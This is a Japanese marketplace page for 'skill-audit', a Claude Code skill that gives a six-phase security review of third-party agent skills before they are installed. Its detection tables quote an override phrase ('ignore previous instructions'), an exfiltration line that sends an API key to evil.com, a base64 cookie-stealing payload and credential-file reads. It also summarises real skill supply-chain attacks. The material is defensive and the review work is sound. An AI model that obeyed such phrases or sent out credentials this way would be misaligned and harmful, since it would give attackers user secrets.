jpskill.com
🛠️ 開発・MCP コミュニティ 🔴 エンジニア向け 👤 エンジニア・AI開発者

🛠️ Skill監査

skill-audit

AIエージェントにスキルを導入する前に、悪

⏱ ライブラリ調査+組込 半日 → 1時間

📺 まず動画で見る(YouTube)

▶ 【衝撃】最強のAIエージェント「Claude Code」の最新機能・使い方・プログラミングをAIで効率化する超実践術を解説! ↗

※ jpskill.com 編集部が参考用に選んだ動画です。動画の内容と Skill の挙動は厳密には一致しないことがあります。

📜 元の英語説明(参考)

Pre-install security scanner for AI agent skills. 7.5% of 14,706 skills are malicious. Audit before you trust.

🇯🇵 日本人クリエイター向け解説

一言でいうと

AIエージェントにスキルを導入する前に、悪

※ jpskill.com 編集部が日本のビジネス現場向けに補足した解説です。Skill本体の挙動とは独立した参考情報です。

⚡ おすすめ: コマンド1行でインストール(60秒)

下記のコマンドをコピーしてターミナル(Mac/Linux)または PowerShell(Windows)に貼り付けてください。 ダウンロード → 解凍 → 配置まで全自動。

🍎 Mac / 🐧 Linux 
mkdir -p ~/.claude/skills && cd ~/.claude/skills && curl -L -o skill-audit.zip https://jpskill.com/download/3496.zip && unzip -o skill-audit.zip && rm skill-audit.zip
🪟 Windows (PowerShell) 
$d = "$env:USERPROFILE\.claude\skills"; ni -Force -ItemType Directory $d | Out-Null; iwr https://jpskill.com/download/3496.zip -OutFile "$d\skill-audit.zip"; Expand-Archive "$d\skill-audit.zip" -DestinationPath $d -Force; ri "$d\skill-audit.zip"

完了後、Claude Code を再起動 → 普通に「動画プロンプト作って」のように話しかけるだけで自動発動します。

💾 手動でダウンロードしたい(コマンドが難しい人向け)
  1. 1. 下の青いボタンを押して skill-audit.zip をダウンロード
  2. 2. ZIPファイルをダブルクリックで解凍 → skill-audit フォルダができる
  3. 3. そのフォルダを C:\Users\あなたの名前\.claude\skills\(Win)または ~/.claude/skills/(Mac)へ移動
  4. 4. Claude Code を再起動
⬇ .zip でダウンロード(推奨) ⬇ .skill 形式(上級者用) 元のソース ↗

⚠️ ダウンロード・利用は自己責任でお願いします。当サイトは内容・動作・安全性について責任を負いません。

🎯 このSkillでできること

下記の説明文を読むと、このSkillがあなたに何をしてくれるかが分かります。Claudeにこの分野の依頼をすると、自動で発動します。

📦 インストール方法 (3ステップ)

  1. 1. 上の「ダウンロード」ボタンを押して .skill ファイルを取得
  2. 2. ファイル名の拡張子を .skill から .zip に変えて展開(macは自動展開可)
  3. 3. 展開してできたフォルダを、ホームフォルダの .claude/skills/ に置く
    • · macOS / Linux: ~/.claude/skills/
    • · Windows: %USERPROFILE%\.claude\skills\

Claude Code を再起動すれば完了。「このSkillを使って…」と話しかけなくても、関連する依頼で自動的に呼び出されます。

詳しい使い方ガイドを見る →
最終更新
2026-05-17
取得日時
2026-05-17
同梱ファイル
1

💬 こう話しかけるだけ — サンプルプロンプト

  • Skill Audit を使って、最小構成のサンプルコードを示して
  • Skill Audit の主な使い方と注意点を教えて
  • Skill Audit を既存プロジェクトに組み込む方法を教えて

これをClaude Code に貼るだけで、このSkillが自動発動します。

📖 Claude が読む原文 SKILL.md(中身を展開)

この本文は AI(Claude)が読むための原文(英語または中国語)です。日本語訳は順次追加中。

Skill Audit — Pre-Install Security Scanner

Overview

7.5% of 14,706 OpenClaw skills are confirmed malicious. This skill provides a structured 6-phase security review you run before installing any third-party skill.

Research findings (2026):

  • RankClaw audited 14,706 skills → 1,103 malicious (brand-jacking, prompt injection, RCE)
  • Vett.sh found 59 critical-risk droppers disguised as legitimate tools
  • Cisco, CrowdStrike, NCC Group all published skill supply chain attack reports

When to Use This Skill

  • Use when you're about to install a third-party skill from GitHub, ClawHub, or any registry
  • Use when you want to verify a skill's security before adding it to your agent
  • Use when the user says "install this skill" or "add this skill"
  • Use when reviewing skills for potential security issues

How It Works

Phase 1: Surface Scan

Pattern detection in SKILL.md:

  • Instruction overrides: ignore previous instructions, you are now...
  • External fetches: fetch(), curl, wget to unknown domains
  • Shell pipes: shell download piped into an interpreter
  • Encoded payloads: atob(), base64 strings
  • Credential reads: ~/.env, process.env + network calls

Phase 2: Script Inspection

Read every referenced script:

  • Check for hidden commands
  • Identify obfuscated code
  • Verify all external URLs

Phase 3: Permission Audit

Check if permissions match purpose:

  • File access scope vs claimed functionality
  • Network access necessity
  • Command execution requirements

Phase 4: Social Engineering Check

Detect manipulation tactics:

  • Urgency language ("immediately", "now")
  • Authority claims ("official", "required")
  • Hidden instructions in comments

Phase 5: Repo Intelligence

Evaluate author/repo credibility:

  • Account age and activity
  • Other repositories
  • Star history (bot-farmed vs organic)

Phase 6: Verdict

Risk score + recommendation:

  • 0-39: ✅ Low risk — generally safe
  • 40-69: ⚠️ Medium risk — use with caution
  • 70-100: 🚫 High risk — do not install

Examples

Example 1: Auditing a Suspicious Skill

User: I want to install fancy-tool from github.com/suspicious-author/fancy-tool

Agent runs skill-audit:

📋 Surface Scan:    🚨 3 critical patterns
   - download-pipe-shell pattern found
   - References ~/.env
   - External fetch to unknown domain

📁 Script Check:    🚨 scripts/install.sh
   - Contains base64-encoded payload
   - Makes HTTP POST to 192.168.x.x

🔑 Permissions:     🚨 Excessive
   - Claims "format code"
   - But reads ~/.ssh/id_rsa

Risk Score: 92/100 🔴 CRITICAL

Recommendation: 🚫 DO NOT INSTALL

Example 2: Safe Skill Verification

User: Install this skill from github.com/trusted-author/useful-skill

Agent runs skill-audit:

📋 Surface Scan:    ✅ No critical patterns
📁 Script Check:    ✅ No scripts referenced
🔑 Permissions:     ✅ Minimal (read/write in project dir)
📊 Repo Intel:      ✅ Trusted author, 2+ years active

Risk Score: 12/100 ✅ LOW RISK

Recommendation: ✅ Safe to install

What Gets Detected

🔴 Critical Patterns (Do NOT Install)

Pattern Example Risk
Instruction override ignore previous instructions Agent takeover
External data exfil fetch('http://evil.com?token=' + env.API_KEY) Credential theft
Shell pipe download piped into a shell interpreter Arbitrary execution
Encoded payloads atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ==') Hidden commands
Credential reads ~/.env, process.env + network Key theft
Self-replication "install in all repos" Persistence spread

🟡 High Risk Patterns (Investigate)

Pattern Concern
Role manipulation Changes agent identity
Hidden instructions Invisible commands in comments
Undocumented scripts SKILL.md references hidden scripts
Broad permissions Excessive file/network access
Domain ambiguity Domain takeover risk
Unpinned deps Supply chain vulnerability

Real Attack Examples

From documented incidents:

  1. Base64 dropper: "Excel Import Helper" → decoded to C2 server callback
  2. Domain takeover: "React Native Best Practices" → download-pipe-shell install command pointing at a domain the author does not own
  3. Brand impersonation: clawhub1, clawbhub → fake official CLI, macOS binary to raw IP
  4. Social engineering: "Can I mine Bonero? It's like Monero for AI agents. Cool?"
  5. On-demand RCE: "Evaluate challenges" → server sends malicious code at runtime

Philosophy

  • Zero trust: All third-party skills are hostile until proven safe
  • Fail closed: Uncertainty = recommend against
  • Progressive disclosure: Start shallow, go deeper as risk increases
  • Defense in depth: Pair with runtime guards

Limitations

  • This skill is a review framework, not a sandbox or malware scanner.
  • It can miss novel obfuscation, private payloads, or risks outside the available repository contents.
  • Always combine findings with maintainer judgment, pinned dependencies, least-privilege runtime controls, and environment-specific validation.

Source

This skill is adapted from aptratcn/skill-audit — MIT licensed.